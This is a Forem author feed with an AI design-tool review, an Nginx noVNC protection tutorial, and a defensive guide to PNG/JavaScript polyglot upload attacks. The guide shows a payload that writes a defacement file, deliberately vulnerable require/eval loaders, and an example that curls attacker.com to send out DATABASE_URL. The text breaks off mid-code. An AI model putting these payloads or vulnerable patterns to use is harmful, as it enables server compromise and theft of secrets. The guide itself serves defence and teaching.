The latest articles on Forem by Keat Porhong (@keat_porhong). https://forem.com/keat_porhong https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1721262%2Fabaa54cf-51d5-46cf-8ddc-2054ac754a6e.jpg https://forem.com/keat_porhong en Keat Porhong Thu, 12 Mar 2026 03:31:11 +0000 https://forem.com/keat_porhong/ai-agentic-tools-that-could-boost-the-uxui-conceptual-for-development-30i6 https://forem.com/keat_porhong/ai-agentic-tools-that-could-boost-the-uxui-conceptual-for-development-30i6 <p>Designing a user experience from scratch is no longer just about "pushing pixels." With agentic AI, the focus has shifted toward <strong>intent-based design</strong>, where your role is to guide a digital assistant to build the scaffolding for you.</p> <p>Here is a detailed breakdown of the four leading tools to help you choose the right one for your development workflow.</p> <h3> 1. Banani AI: The High-Fidelity "Taste" Engine </h3> <p>Banani AI is built for those who want prototypes that look like they were made by a senior designer. It specializes in "vibe-driven" design where aesthetic quality is the priority.</p> <ul> <li> <strong>Benefit:</strong> Generates clean, modern interfaces that don't feel like "generic AI." It is particularly strong for high-fidelity dashboards and SaaS landing pages.</li> <li><strong>The Workflow:</strong></li> <li> <strong>Describe:</strong> Input a prompt like <em>"A neomorphic habit tracker with data visualization cards."</em> </li> <li> <strong>Iterate:</strong> Use the AI chat to refine specific parts (e.g., <em>"Make the primary buttons more rounded and add a dark mode toggle"</em>).</li> <li><p><strong>Handoff:</strong> Copy the design directly into Figma as editable layers with Auto Layout intact.</p></li> <li><p><strong>Pros:</strong> * Direct "copy-paste" integration with Figma.</p></li> <li><p>Includes a "Model Picker" allowing you to choose between top engines like Gemini 3 Pro.</p></li> <li><p>Excellent theme management and branding controls.</p></li> <li><p><strong>Cons:</strong> Not ideal for extremely complex, data-heavy enterprise logic that requires strict custom components.</p></li> <li><p><strong>Usage Limitations:</strong> The <strong>Free Tier</strong> provides ~20 generations per month. <strong>Pro ($20/mo)</strong> offers unlimited generations and HTML/CSS code export.</p></li> </ul> <h3> 2. AI Designer: The Aesthetic Innovator </h3> <p>AI Designer (aidesigner.ai) is known for its "Website Cloner" and its ability to create unique, non-repetitive layouts that stand out from the typical "SaaS-block" look.</p> <ul> <li> <strong>Benefit:</strong> Perfect for rapid visual exploration and breaking "blank page syndrome" with highly creative layouts.</li> <li><strong>The Workflow:</strong></li> <li> <strong>Select:</strong> Choose a project type (Mobile vs. Web).</li> <li> <strong>Prompt:</strong> Enter your core idea. You can also attach a "Classic Link" to clone the structure of an existing site.</li> <li><p><strong>Refine:</strong> Use the ASCII generator or built-in style templates to pivot the look instantly.</p></li> <li><p><strong>Pros:</strong> * Unique visual outputs that avoid the "AI look."</p></li> <li><p>One-shot generation for entire multi-page flows.</p></li> <li><p>Built-in website cloning features for competitor research.</p></li> <li><p><strong>Cons:</strong> Manual editing tools are less robust than specialized design platforms like Figma or Uizard.</p></li> <li><p><strong>Usage Limitations:</strong> Most high-fidelity features and website cloning tools are reserved for <strong>Premium</strong> subscribers.</p></li> </ul> <h3> 3. UXMagic: The Architect’s Copilot </h3> <p>UXMagic (formerly UX Pilot) focuses on the "UX" part of the equation—structure, sitemaps, and wireframes—before jumping into high-fidelity visuals.</p> <ul> <li> <strong>Benefit:</strong> It understands the "bones" of a website. It’s the best tool for planning the user journey before worrying about the colors.</li> <li><strong>The Workflow:</strong></li> <li> <strong>Strategy:</strong> Generate a sitemap based on your product requirements.</li> <li> <strong>Sketching:</strong> Use the "Sketch to UI" or "Image to UI" feature to turn a whiteboard drawing into a wireframe.</li> <li><p><strong>High-Fi:</strong> Transform that wireframe into a high-fidelity design within the same platform.</p></li> <li><p><strong>Pros:</strong> * <strong>Image-to-UI:</strong> You can upload a screenshot of an app you like and have it converted into editable elements.</p></li> <li><p>Support for production-ready <strong>React and HTML/CSS</strong> code.</p></li> <li><p><strong>Cons:</strong> The learning curve is slightly higher because it covers more of the professional design lifecycle.</p></li> <li><p><strong>Usage Limitations:</strong> <strong>Free Tier</strong> gives 100 one-time credits. <strong>Premium ($18/mo)</strong> grants 480 monthly credits and React code exports.</p></li> </ul> <h3> 4. Uizard: The "Sketch-to-Product" OG </h3> <p>Uizard is the most comprehensive platform for teams that need to go from a brainstorm on a napkin to a clickable prototype without any design training.</p> <ul> <li> <strong>Benefit:</strong> Its "Autodesigner 2.0" uses a conversational interface (like ChatGPT) to build entire app flows.</li> <li><strong>The Workflow:</strong></li> <li> <strong>Ingest:</strong> Use the <strong>Wireframe Scanner</strong> to take a photo of a hand-drawn sketch.</li> <li> <strong>Design:</strong> Ask the AI to "apply a modern fintech theme" to the scanned sketch.</li> <li><p><strong>Analyze:</strong> Use the <strong>Focus Predictor</strong> (Heatmaps) to see where users will look first.</p></li> <li><p><strong>Pros:</strong> * AI Heatmaps for data-driven design decisions.</p></li> <li><p>Real-time "Multiplayer" collaboration (similar to Google Docs).</p></li> <li><p>Extensive template library for web, mobile, and tablet.</p></li> <li><p><strong>Cons:</strong> Does not export to Figma; you are locked into the Uizard ecosystem for editing.</p></li> <li><p><strong>Usage Limitations:</strong> The <strong>Free Plan</strong> is limited to 2 projects and 3 AI generations/month. <strong>Pro ($12/mo)</strong> unlocks 500 generations and developer handoff.</p></li> </ul> <h3> <strong>5. Google Stitch (stitch.withgoogle.com)</strong> </h3> <p><strong>The Gemini-Powered Prototyper</strong><br> Introduced as an evolution of Galileo AI (which Google acquired), Stitch is deeply integrated with the Gemini ecosystem. It’s designed to be a unified space where a prompt or a sketch becomes a functional, exportable interface in minutes.</p> <ul> <li> <strong>Benefit:</strong> Offers a seamless transition from a rough idea to actual <strong>Tailwind CSS/HTML code</strong> or fully editable <strong>Figma layers</strong>. It is uniquely capable of switching between high-speed "Standard" drafts and high-detail "Experimental" outputs.</li> <li><strong>The Workflow:</strong></li> <li> <strong>Select Mode:</strong> Choose <strong>Standard</strong> (powered by Gemini Flash for speed) or <strong>Experimental</strong> (Gemini Pro for image-based inputs).</li> <li> <strong>Multimodal Input:</strong> Type a prompt (e.g., <em>"A minimalist e-commerce store for indoor plants with a soft green palette"</em>) <strong>OR</strong> upload a photo of a whiteboard wireframe.</li> <li> <strong>Refine &amp; Branch:</strong> Use the "Iterative Exploration" feature to select a screen and ask for changes like <em>"Add a reviews section below the product image."</em> You can generate multiple variations to compare side-by-side.</li> <li><p><strong>Export:</strong> Use the "Paste to Figma" button to move the Auto Layout frames into your design file, or copy the production-ready code.</p></li> <li><p><strong>Pros:</strong></p></li> <li><p><strong>Figma Integration:</strong> Unlike some tools that give you flat images, Stitch provides nested layers and design tokens.</p></li> <li><p><strong>Image-to-UI:</strong> One of the most robust engines for interpreting hand-drawn sketches.</p></li> <li><p><strong>Branching:</strong> Allows you to experiment with different design "paths" without losing your previous version.</p></li> <li><p><strong>Cons:</strong></p></li> <li><p><strong>Generic Outputs:</strong> Without highly detailed prompts, it can lean toward safe, standard layouts.</p></li> <li><p><strong>Experimental Mode Limits:</strong> Image-based generation is currently slower and doesn't always support the one-click Figma export yet.</p></li> <li><p><strong>Usage Limitations:</strong> It currently operates on a monthly credit system (e.g., ~350 screens in Standard mode and ~50 in Experimental mode). It is currently free via Google Labs but subject to these caps.</p></li> </ul> <h3> <strong>Final Recommendation</strong> </h3> <p>For the ultimate agentic workflow, I suggest "Stitching" them together:</p> <ol> <li> <strong>Ideate</strong> with <strong>Google Stitch</strong> or <strong>Uizard</strong> to turn your whiteboard sketches into digital wireframes.</li> <li> <strong>Refine</strong> the aesthetic "vibe" and UI components using <strong>Banani AI</strong> or <strong>AI Designer</strong>.</li> <li> <strong>Ship</strong> the final concept into <strong>UXMagic</strong> or <strong>Figma</strong> to polish the UX logic and hand off the code to your developers.</li> </ol> <p>By utilizing these tools, you aren't just designing—you're <strong>orchestrating</strong>. This agentic approach saves hours of manual labor and lets you focus on the creative strategy that truly matters.</p> ai webdev ui programming Keat Porhong Wed, 04 Feb 2026 02:50:03 +0000 https://forem.com/keat_porhong/how-to-password-protect-dockurrwindows-novnc-port-8006-using-nginx-reverse-proxy-1ei0 https://forem.com/keat_porhong/how-to-password-protect-dockurrwindows-novnc-port-8006-using-nginx-reverse-proxy-1ei0 <p>Running Windows inside Docker using <code>dockurr/windows</code> is incredibly convenient, especially with its built-in noVNC web interface on port <strong>8006</strong>.</p> <p>However…<br> 🚨 By default, that web interface has <strong>no authentication</strong>.</p> <p>Anyone who reaches <code>http://your-server:8006</code> can see your Windows desktop.</p> <p>In this article, I’ll show you how to:</p> <p>✅ Hide port 8006 from the internet<br> ✅ Add a password prompt in front of noVNC<br> ✅ Use Nginx as a reverse proxy<br> ✅ Keep everything simple and Docker-based</p> <h2> 🧱 Architecture </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Browser | v Nginx (port 8080, password protected) | v dockurr/windows (noVNC on 8006, localhost/internal only) </code></pre> </div> <h2> ✅ Prerequisites </h2> <ul> <li>Docker &amp; Docker Compose installed</li> <li>Linux host (Ubuntu/Debian/VPS)</li> <li>Basic terminal knowledge</li> </ul> <h2> 📝 Final docker-compose.yml </h2> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">services</span><span class="pi">:</span> <span class="na">windows</span><span class="pi">:</span> <span class="na">image</span><span class="pi">:</span> <span class="s">dockurr/windows</span> <span class="na">container_name</span><span class="pi">:</span> <span class="s">windows</span> <span class="na">environment</span><span class="pi">:</span> <span class="na">VERSION</span><span class="pi">:</span> <span class="s2">"</span><span class="s">10l"</span> <span class="na">DISK_SIZE</span><span class="pi">:</span> <span class="s2">"</span><span class="s">32G"</span> <span class="na">RAM_SIZE</span><span class="pi">:</span> <span class="s2">"</span><span class="s">4G"</span> <span class="na">CPU_CORES</span><span class="pi">:</span> <span class="s2">"</span><span class="s">2"</span> <span class="na">USERNAME</span><span class="pi">:</span> <span class="s2">"</span><span class="s">test"</span> <span class="na">PASSWORD</span><span class="pi">:</span> <span class="s2">"</span><span class="s">123123"</span> <span class="na">devices</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">/dev/kvm</span> <span class="pi">-</span> <span class="s">/dev/net/tun</span> <span class="na">cap_add</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">NET_ADMIN</span> <span class="na">ports</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">127.0.0.1:8006:8006"</span> <span class="c1"># noVNC only on localhost</span> <span class="pi">-</span> <span class="s">3389:3389/tcp</span> <span class="pi">-</span> <span class="s">3389:3389/udp</span> <span class="na">volumes</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">./storage:/storage</span> <span class="pi">-</span> <span class="s">./shared:/shared</span> <span class="na">restart</span><span class="pi">:</span> <span class="s">always</span> <span class="na">stop_grace_period</span><span class="pi">:</span> <span class="s">2m</span> <span class="na">networks</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">win_net</span> <span class="na">novnc_proxy</span><span class="pi">:</span> <span class="na">image</span><span class="pi">:</span> <span class="s">nginx:alpine</span> <span class="na">container_name</span><span class="pi">:</span> <span class="s">novnc_proxy</span> <span class="na">depends_on</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">windows</span> <span class="na">ports</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">8080:80"</span> <span class="c1"># public protected port</span> <span class="na">volumes</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">./nginx.conf:/etc/nginx/conf.d/default.conf:ro</span> <span class="pi">-</span> <span class="s">./htpasswd:/etc/nginx/.htpasswd:ro</span> <span class="na">restart</span><span class="pi">:</span> <span class="s">always</span> <span class="na">networks</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">win_net</span> <span class="na">networks</span><span class="pi">:</span> <span class="na">win_net</span><span class="pi">:</span> <span class="na">driver</span><span class="pi">:</span> <span class="s">bridge</span> </code></pre> </div> <h2> 🔒 Nginx Configuration (nginx.conf) </h2> <p>Create file: <code>nginx.conf</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight nginx"><code><span class="k">server</span> <span class="p">{</span> <span class="kn">listen</span> <span class="mi">80</span><span class="p">;</span> <span class="kn">auth_basic</span> <span class="s">"Protected</span> <span class="s">noVNC"</span><span class="p">;</span> <span class="kn">auth_basic_user_file</span> <span class="n">/etc/nginx/.htpasswd</span><span class="p">;</span> <span class="kn">location</span> <span class="n">/</span> <span class="p">{</span> <span class="kn">proxy_pass</span> <span class="s">http://windows:8006</span><span class="p">;</span> <span class="c1"># WebSocket support for noVNC</span> <span class="kn">proxy_http_version</span> <span class="mf">1.1</span><span class="p">;</span> <span class="kn">proxy_set_header</span> <span class="s">Upgrade</span> <span class="nv">$http_upgrade</span><span class="p">;</span> <span class="kn">proxy_set_header</span> <span class="s">Connection</span> <span class="s">"upgrade"</span><span class="p">;</span> <span class="kn">proxy_set_header</span> <span class="s">Host</span> <span class="nv">$host</span><span class="p">;</span> <span class="kn">proxy_set_header</span> <span class="s">X-Real-IP</span> <span class="nv">$remote_addr</span><span class="p">;</span> <span class="kn">proxy_set_header</span> <span class="s">X-Forwarded-For</span> <span class="nv">$proxy_add_x_forwarded_for</span><span class="p">;</span> <span class="kn">proxy_set_header</span> <span class="s">X-Forwarded-Proto</span> <span class="nv">$scheme</span><span class="p">;</span> <span class="kn">proxy_read_timeout</span> <span class="mi">86400</span><span class="p">;</span> <span class="kn">proxy_send_timeout</span> <span class="mi">86400</span><span class="p">;</span> <span class="kn">proxy_buffering</span> <span class="no">off</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h2> 🔑 Create Username &amp; Password </h2> <p>Generate <code>htpasswd</code> file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">--rm</span> httpd:2.4-alpine <span class="se">\</span> htpasswd <span class="nt">-nb</span> admin STRONG_PASSWORD <span class="o">&gt;</span> htpasswd </code></pre> </div> <p>Replace:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>admin -&gt; your username STRONG_PASSWORD -&gt; your password </code></pre> </div> <h2> ▶ Start Everything </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker compose up <span class="nt">-d</span> </code></pre> </div> <h2> 🧪 Test </h2> <p>From another machine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>http://SERVER_IP:8006 ❌ should NOT open http://SERVER_IP:8080 ✅ shows login prompt </code></pre> </div> <p>After login → Windows desktop appears.</p> <h2> 🔐 Extra Security Tips </h2> <ul> <li>Use a long, strong password</li> <li>If you don’t need public RDP: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="pi">-</span> <span class="s2">"</span><span class="s">127.0.0.1:3389:3389/tcp"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">127.0.0.1:3389:3389/udp"</span> </code></pre> </div> <ul> <li>Consider VPN (Tailscale/WireGuard) for even stronger protection</li> <li>Add HTTPS later with Nginx + Let’s Encrypt</li> </ul> <h2> 🎯 Result </h2> <p>You now have:</p> <p>✅ Hidden noVNC<br> ✅ Password-protected access<br> ✅ No changes inside Windows<br> ✅ Fully containerized solution</p> <p>If this helped you, feel free to like or comment.<br> Happy self-hosting! 🚀</p> containers docker security tutorial Keat Porhong Wed, 17 Dec 2025 07:05:28 +0000 https://forem.com/keat_porhong/image-upload-attack-security-analysis-prevention-guide-333e https://forem.com/keat_porhong/image-upload-attack-security-analysis-prevention-guide-333e <h2> Executive Summary </h2> <p>Polyglot image upload attacks exploit applications that process uploaded files without proper validation. A polyglot file is a file that is valid in multiple formats simultaneously - in this case, a file that is both a valid PNG image and executable JavaScript code. When applications process these files without proper security measures, the embedded code can execute, leading to remote code execution (RCE) vulnerabilities.</p> <p><strong>Severity</strong>: Critical (CVSS 9.8 - Critical)</p> <p><strong>Impact</strong>: Remote Code Execution, Server Compromise, Data Breach</p> <h2> Table of Contents </h2> <ol> <li>Understanding Polyglot Files</li> <li>How the Attack Works</li> <li>Attack Vector Analysis</li> <li>Real-World Vulnerable Patterns</li> <li>Why This Attack is Dangerous</li> <li>Prevention Strategies</li> <li>Detection and Monitoring</li> <li>Incident Response</li> </ol> <h2> Understanding Polyglot Files </h2> <h3> What is a Polyglot File? </h3> <p>A polyglot file is a file that is valid in multiple file formats simultaneously. In this attack scenario, we're dealing with a <strong>PNG/JavaScript polyglot</strong> - a file that:</p> <ol> <li> <strong>Is a valid PNG image</strong> - Can be opened in image viewers, passes image validation, displays correctly</li> <li> <strong>Contains executable JavaScript code</strong> - Has JavaScript code embedded after the PNG data that can execute in Node.js environments</li> </ol> <h3> Structure of a PNG/JavaScript Polyglot </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[PNG Header: \x89PNG\r\n\x1a\n] [PNG Chunks: IHDR, IDAT, IEND] [IEND Chunk Marker] [4-byte CRC] [JavaScript Code Starts Here] </code></pre> </div> <p><strong>Key Points:</strong></p> <ul> <li>PNG parsers stop reading at the IEND chunk (end of image marker)</li> <li>Any data after IEND is ignored by image processors</li> <li>Node.js <code>require()</code> or <code>vm.runInThisContext()</code> will attempt to parse the entire file</li> <li>JavaScript code after IEND executes when the file is processed as code</li> </ul> <h3> Example Polyglot Structure </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Valid PNG image data (binary)</span> <span class="nx">PNG_HEADER</span> <span class="o">+</span> <span class="nx">IHDR</span> <span class="o">+</span> <span class="nx">IDAT</span> <span class="o">+</span> <span class="nx">IEND</span> <span class="o">+</span> <span class="nc">CRC</span><span class="p">(</span> <span class="c1">// JavaScript code (text) - ignored by PNG parsers</span> <span class="c1">// PNG/Node.js Polyglot</span> <span class="nf">function </span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">fs</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">"</span><span class="s2">fs</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">outputFile</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span> <span class="nx">process</span><span class="p">.</span><span class="nf">cwd</span><span class="p">(),</span> <span class="dl">"</span><span class="s2">We_are_hacked_your_site.txt</span><span class="dl">"</span> <span class="p">);</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">writeFileSync</span><span class="p">(</span><span class="nx">outputFile</span><span class="p">,</span> <span class="dl">"</span><span class="s2">We are hacked your site</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">utf8</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">)();</span> <span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="p">{};</span> </code></pre> </div> <h2> How the Attack Works </h2> <h3> Attack Flow </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1. Attacker creates polyglot PNG/JS file ↓ 2. Attacker uploads file as "image.png" to target application ↓ 3. Application validates file: - Checks file signature (✓ Valid PNG) - Checks MIME type (✓ image/png) - File passes validation ↓ 4. Application processes image: - Converts to WebP using Sharp - Saves original file to uploads/originals/image_TIMESTAMP.png ↓ 5. Background file processor/watcher detects new file ↓ 6. File processor attempts to execute file: - Tries require(filePath) - Or tries vm.runInThisContext(fileContent) - Or tries eval(fileContent) ↓ 7. JavaScript code after IEND chunk executes ↓ 8. Malicious code runs with server privileges - Creates files - Executes commands - Accesses file system - Potentially gains RCE </code></pre> </div> <h3> Why It Works </h3> <ol> <li> <strong>File Validation Bypass</strong>: The file is a valid PNG, so it passes image validation</li> <li> <strong>Extension Preservation</strong>: Many apps preserve original filenames/extensions</li> <li> <strong>File Processing</strong>: Background processes may execute files without content validation</li> <li> <strong>Node.js Behavior</strong>: Node.js can <code>require()</code> files with any extension using full paths</li> <li> <strong>No Content Validation</strong>: Apps don't check for embedded code in image files</li> </ol> <h2> Attack Vector Analysis </h2> <h3> Vulnerable Application Patterns </h3> <h4> 1. Image Upload with Original File Saving </h4> <p><strong>Vulnerable Code Pattern:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Saves original file with preserved extension</span> <span class="kd">const</span> <span class="nx">savedPath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">uploadsDir</span><span class="p">,</span> <span class="s2">`</span><span class="p">${</span><span class="nx">filename</span><span class="p">}</span><span class="s2">_</span><span class="p">${</span><span class="nx">timestamp</span><span class="p">}${</span><span class="nx">ext</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">writeFileSync</span><span class="p">(</span><span class="nx">savedPath</span><span class="p">,</span> <span class="nx">imageBuffer</span><span class="p">);</span> </code></pre> </div> <p><strong>Why It's Vulnerable:</strong></p> <ul> <li>Preserves original filename and extension</li> <li>If file is later processed, it maintains its identity</li> <li>No content validation before saving</li> </ul> <h4> 2. Background File Watchers </h4> <p><strong>Vulnerable Code Pattern:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// File watcher that processes new uploads</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">watch</span><span class="p">(</span><span class="nx">uploadsDir</span><span class="p">,</span> <span class="p">(</span><span class="nx">eventType</span><span class="p">,</span> <span class="nx">filename</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">eventType</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">rename</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">filePath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">uploadsDir</span><span class="p">,</span> <span class="nx">filename</span><span class="p">);</span> <span class="nf">require</span><span class="p">(</span><span class="nx">filePath</span><span class="p">);</span> <span class="c1">// ⚠️ VULNERABLE</span> <span class="p">}</span> <span class="p">});</span> </code></pre> </div> <p><strong>Why It's Vulnerable:</strong></p> <ul> <li>Automatically processes new files</li> <li>Tries to execute files without validation</li> <li>No content checking before execution</li> </ul> <h4> 3. Plugin/Module Loading Systems </h4> <p><strong>Vulnerable Code Pattern:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Plugin loader that requires files</span> <span class="kd">const</span> <span class="nx">plugins</span> <span class="o">=</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">readdirSync</span><span class="p">(</span><span class="nx">pluginsDir</span><span class="p">);</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">plugin</span> <span class="k">of</span> <span class="nx">plugins</span><span class="p">)</span> <span class="p">{</span> <span class="nf">require</span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">pluginsDir</span><span class="p">,</span> <span class="nx">plugin</span><span class="p">));</span> <span class="c1">// ⚠️ VULNERABLE</span> <span class="p">}</span> </code></pre> </div> <p><strong>Why It's Vulnerable:</strong></p> <ul> <li>Loads files as modules without validation</li> <li>Assumes files are safe JavaScript</li> <li>No content verification</li> </ul> <h4> 4. Dynamic Code Execution </h4> <p><strong>Vulnerable Code Pattern:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Asset processor that evaluates files</span> <span class="kd">const</span> <span class="nx">fileContent</span> <span class="o">=</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">readFileSync</span><span class="p">(</span><span class="nx">filePath</span><span class="p">,</span> <span class="dl">"</span><span class="s2">utf-8</span><span class="dl">"</span><span class="p">);</span> <span class="nx">vm</span><span class="p">.</span><span class="nf">runInThisContext</span><span class="p">(</span><span class="nx">fileContent</span><span class="p">);</span> <span class="c1">// ⚠️ VULNERABLE</span> </code></pre> </div> <p><strong>Why It's Vulnerable:</strong></p> <ul> <li>Executes file content as code</li> <li>No validation of file contents</li> <li>Assumes files are safe to execute</li> </ul> <h2> Real-World Vulnerable Patterns </h2> <h3> Common Scenarios Where This Attack Works </h3> <ol> <li><strong>Content Management Systems (CMS)</strong></li> </ol> <ul> <li>Upload images for content</li> <li>Background processors scan uploads directory</li> <li>Plugin systems load files dynamically</li> </ul> <ol> <li><strong>E-commerce Platforms</strong></li> </ol> <ul> <li>Product image uploads</li> <li>Image optimization services</li> <li>File watchers for processing</li> </ul> <ol> <li><strong>Social Media Platforms</strong></li> </ol> <ul> <li>Profile picture uploads</li> <li>Media processing pipelines</li> <li>Asset management systems</li> </ul> <ol> <li><strong>Blog/Website Builders</strong></li> </ol> <ul> <li>Image uploads for posts</li> <li>Theme/plugin systems</li> <li>File processing workers</li> </ul> <ol> <li> <strong>API Services</strong> <ul> <li>Image upload endpoints</li> <li>File processing microservices</li> <li>Background job processors</li> </ul> </li> </ol> <h3> Real-World Attack Example </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Attacker creates polyglot</span> <span class="kd">const</span> <span class="nx">polyglot</span> <span class="o">=</span> <span class="nf">createPNGWithJS</span><span class="p">(</span><span class="s2">` const { exec } = require('child_process'); exec('curl http://attacker.com/steal?data=' + encodeURIComponent(process.env.DATABASE_URL)); `</span><span class="p">);</span> <span class="c1">// Uploads as "profile_picture.png"</span> <span class="c1">// Application saves to: uploads/originals/profile_picture_1234567890.png</span> <span class="c1">// Background processor executes:</span> <span class="nf">require</span><span class="p">(</span><span class="dl">"</span><span class="s2">uploads/originals/profile_picture_1234567890.png</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// Malicious code executes, exfiltrates data</span> </code></pre> </div> <h2> Why This Attack is Dangerous </h2> <h3> 1. Stealth </h3> <ul> <li> <strong>Looks like a normal image</strong>: Passes all image validation</li> <li> <strong>No suspicious extensions</strong>: Uses <code>.png</code> extension</li> <li> <strong>No obvious indicators</strong>: Appears legitimate to security scanners</li> <li> <strong>Hard to detect</strong>: Embedded code is invisible to image viewers</li> </ul> <h3> 2. High Success Rate </h3> <ul> <li> <strong>Common vulnerable patterns</strong>: Many apps use file watchers/processors</li> <li> <strong>No content validation</strong>: Most apps don't check for embedded code</li> <li> <strong>Automatic execution</strong>: Background processes execute without user interaction</li> <li> <strong>Multiple attack vectors</strong>: Works with various execution methods</li> </ul> <h3> 3. Severe Impact </h3> <ul> <li> <strong>Remote Code Execution</strong>: Full server compromise possible</li> <li> <strong>Data Exfiltration</strong>: Access to databases, files, secrets</li> <li> <strong>Lateral Movement</strong>: Can pivot to other systems</li> <li> <strong>Persistence</strong>: Can install backdoors, maintain access</li> </ul> <h3> 4. Difficult to Detect </h3> <ul> <li> <strong>No explicit extraction code</strong>: Attack doesn't require suspicious code</li> <li> <strong>Normal file operations</strong>: Uses standard Node.js APIs</li> <li> <strong>Blends with legitimate traffic</strong>: Looks like normal image uploads</li> <li> <strong>No obvious errors</strong>: Fails silently if execution doesn't work</li> </ul> <h2> Prevention Strategies </h2> <h3> 1. Content Validation </h3> <h4> Validate File Contents, Not Just Extensions </h4> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">fileTypeFromBuffer</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">file-type</span><span class="dl">"</span><span class="p">;</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">validateImageFile</span><span class="p">(</span><span class="nx">buffer</span><span class="p">:</span> <span class="nx">Buffer</span><span class="p">):</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="nx">boolean</span><span class="o">&gt;</span> <span class="p">{</span> <span class="c1">// Check actual file type from content</span> <span class="kd">const</span> <span class="nx">fileType</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fileTypeFromBuffer</span><span class="p">(</span><span class="nx">buffer</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fileType</span> <span class="o">||</span> <span class="nx">fileType</span><span class="p">.</span><span class="nx">mime</span> <span class="o">!==</span> <span class="dl">"</span><span class="s2">image/png</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Verify PNG structure</span> <span class="k">if </span><span class="p">(</span> <span class="o">!</span><span class="nx">buffer</span> <span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">8</span><span class="p">)</span> <span class="p">.</span><span class="nf">equals</span><span class="p">(</span><span class="nx">Buffer</span><span class="p">.</span><span class="k">from</span><span class="p">([</span><span class="mh">0x89</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="mh">0x4e</span><span class="p">,</span> <span class="mh">0x47</span><span class="p">,</span> <span class="mh">0x0d</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x1a</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">]))</span> <span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Check for data after IEND chunk</span> <span class="kd">const</span> <span class="nx">iendPos</span> <span class="o">=</span> <span class="nx">buffer</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="nx">Buffer</span><span class="p">.</span><span class="k">from</span><span class="p">(</span><span class="dl">"</span><span class="s2">IEND</span><span class="dl">"</span><span class="p">));</span> <span class="k">if </span><span class="p">(</span><span class="nx">iendPos</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">iendEnd</span> <span 